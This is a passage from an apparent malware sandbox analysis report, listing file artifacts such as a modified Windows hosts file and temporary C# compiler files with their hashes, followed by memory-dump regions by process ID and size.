                                                                              SHA512

                                                                              c0de136f920d77de703390754ccda4f403a71d6fd10fd3f43d72e5e227a33e2d5240cc9d0fa1e73023b5c9ff23a1675937200aeeb25fb0da4d830b584eb77fb3

                                                                            • C:\Windows\System32\drivers\etc\hosts

                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                              SHA1

                                                                              e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                              SHA256

                                                                              a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                              SHA512

                                                                              c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\zmueggx1\CSC8F7293B51AEB446686E56B9CBAF603C.TMP

                                                                              Filesize

                                                                              652B

                                                                              MD5

                                                                              40dc429c49d9cc18924defc1345f291c

                                                                              SHA1

                                                                              41008815f7eb5ad5d2f88596f2f7ada701d4b897

                                                                              SHA256

                                                                              1416e89c109452fc22b6e11e8b128d9f3211b8dbeb354f41d03b7ab07c58979e

                                                                              SHA512

                                                                              7c4795a457f888037ce46f59de8029ad8524ac718dc9760b6180aa6042af6ce3dad1f794bddeccbb561db8e88c09312254ff3d3ccb41116903ab019e35920099

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\zmueggx1\zmueggx1.0.cs

                                                                              Filesize

                                                                              1004B

                                                                              MD5

                                                                              c76055a0388b713a1eabe16130684dc3

                                                                              SHA1

                                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                                              SHA256

                                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                              SHA512

                                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\zmueggx1\zmueggx1.cmdline

                                                                              Filesize

                                                                              607B

                                                                              MD5

                                                                              07ab88dc3417d5440b1492473c1595ee

                                                                              SHA1

                                                                              103187ac8ba0657967d19c88b3d03828ad0fa289

                                                                              SHA256

                                                                              8a300d624aa0f2016d932040a0d30f65eba81bb89057ef1ab6f604738c4ecc98

                                                                              SHA512

                                                                              0982ae34a62b0b726b6419950ae0951c46dc57bb0ae930ffcb9bfdbb03a65a01fe6fc9238fe929086326bca3e0ef29427a5593bf0517631737f21d93a012dbae

                                                                            • memory/680-516-0x0000019BE8DB0000-0x0000019BE8DB6000-memory.dmp

                                                                              Filesize

                                                                              24KB

                                                                            • memory/680-517-0x0000019BEA8D0000-0x0000019BEA8D6000-memory.dmp

                                                                              Filesize

                                                                              24KB

                                                                            • memory/720-421-0x0000028756590000-0x000002875834E000-memory.dmp

                                                                              Filesize

                                                                              29.7MB

                                                                            • memory/720-423-0x000002873BE80000-0x000002873BE8A000-memory.dmp

                                                                              Filesize

                                                                              40KB

                                                                            • memory/720-422-0x000002873BE40000-0x000002873BE52000-memory.dmp

                                                                              Filesize

                                                                              72KB

                                                                            • memory/720-420-0x0000028736790000-0x000002873854F000-memory.dmp

                                                                              Filesize

                                                                              29.7MB

                                                                            • memory/2500-107-0x000001B71E090000-0x000001B71E0B2000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/3820-288-0x00000275EA360000-0x00000275EA368000-memory.dmp

                                                                              Filesize

                                                                              32KB

                                                                            • memory/4120-82-0x00007FFD65960000-0x00007FFD65ADF000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/4120-472-0x00007FFD64540000-0x00007FFD6465A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/4120-135-0x00007FFD6F160000-0x00007FFD6F184000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/4120-106-0x00007FFD64540000-0x00007FFD6465A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/4120-100-0x00007FFD74B50000-0x00007FFD74B7D000-memory.dmp

                                                                              Filesize

                                                                              180KB

                                                                            • memory/4120-98-0x00007FFD6CDE0000-0x00007FFD6CDF4000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/4120-101-0x00007FFD75960000-0x00007FFD7596D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4120-370-0x00007FFD66570000-0x00007FFD665A3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/4120-372-0x00007FFD64B90000-0x00007FFD64C5D000-memory.dmp

                                                                              Filesize

                                                                              820KB

                                                                            • memory/4120-373-0x000001C393340000-0x000001C393869000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4120-92-0x00007FFD64C60000-0x00007FFD65325000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/4120-96-0x00007FFD74BD0000-0x00007FFD74BF5000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/4120-95-0x00007FFD64660000-0x00007FFD64B89000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4120-94-0x000001C393340000-0x000001C393869000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4120-93-0x00007FFD64B90000-0x00007FFD64C5D000-memory.dmp

                                                                              Filesize

                                                                              820KB

                                                                            • memory/4120-88-0x00007FFD66570000-0x00007FFD665A3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/4120-84-0x00007FFD6F140000-0x00007FFD6F159000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/4120-383-0x00007FFD64660000-0x00007FFD64B89000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4120-385-0x00007FFD74BD0000-0x00007FFD74BF5000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/4120-384-0x00007FFD64C60000-0x00007FFD65325000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/4120-399-0x00007FFD64540000-0x00007FFD6465A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/4120-398-0x00007FFD75960000-0x00007FFD7596D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4120-390-0x00007FFD65960000-0x00007FFD65ADF000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/4120-86-0x00007FFD78C20000-0x00007FFD78C2D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4120-78-0x00007FFD74650000-0x00007FFD7466A000-memory.dmp

                                                                              Filesize

                                                                              104KB

                                                                            • memory/4120-80-0x00007FFD6F160000-0x00007FFD6F184000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/4120-76-0x00007FFD74B50000-0x00007FFD74B7D000-memory.dmp

                                                                              Filesize

                                                                              180KB

                                                                            • memory/4120-459-0x00007FFD64660000-0x00007FFD64B89000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4120-460-0x00007FFD74BD0000-0x00007FFD74BF5000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/4120-253-0x00007FFD65960000-0x00007FFD65ADF000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/4120-471-0x00007FFD75960000-0x00007FFD7596D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4120-470-0x00007FFD6CDE0000-0x00007FFD6CDF4000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/4120-469-0x00007FFD64B90000-0x00007FFD64C5D000-memory.dmp

                                                                              Filesize

                                                                              820KB

                                                                            • memory/4120-468-0x00007FFD66570000-0x00007FFD665A3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/4120-467-0x00007FFD78C20000-0x00007FFD78C2D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4120-466-0x00007FFD6F140000-0x00007FFD6F159000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/4120-465-0x00007FFD65960000-0x00007FFD65ADF000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/4120-464-0x00007FFD6F160000-0x00007FFD6F184000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/4120-463-0x00007FFD74650000-0x00007FFD7466A000-memory.dmp

                                                                              Filesize

                                                                              104KB

                                                                            • memory/4120-462-0x00007FFD74B50000-0x00007FFD74B7D000-memory.dmp

                                                                              Filesize

                                                                              180KB

                                                                            • memory/4120-461-0x00007FFD78D10000-0x00007FFD78D1F000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/4120-444-0x00007FFD64C60000-0x00007FFD65325000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/4120-70-0x00007FFD78D10000-0x00007FFD78D1F000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/4120-47-0x00007FFD64C60000-0x00007FFD65325000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/4120-52-0x00007FFD74BD0000-0x00007FFD74BF5000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/4360-504-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-509-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-512-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-511-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-510-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-508-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-514-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-506-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-507-0x00000000005E0000-0x0000000000600000-memory.dmp

                                                                              Filesize

                                                                              128KB

                                                                            • memory/4360-518-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-519-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB

                                                                            • memory/4360-521-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                              Filesize

                                                                              7.5MB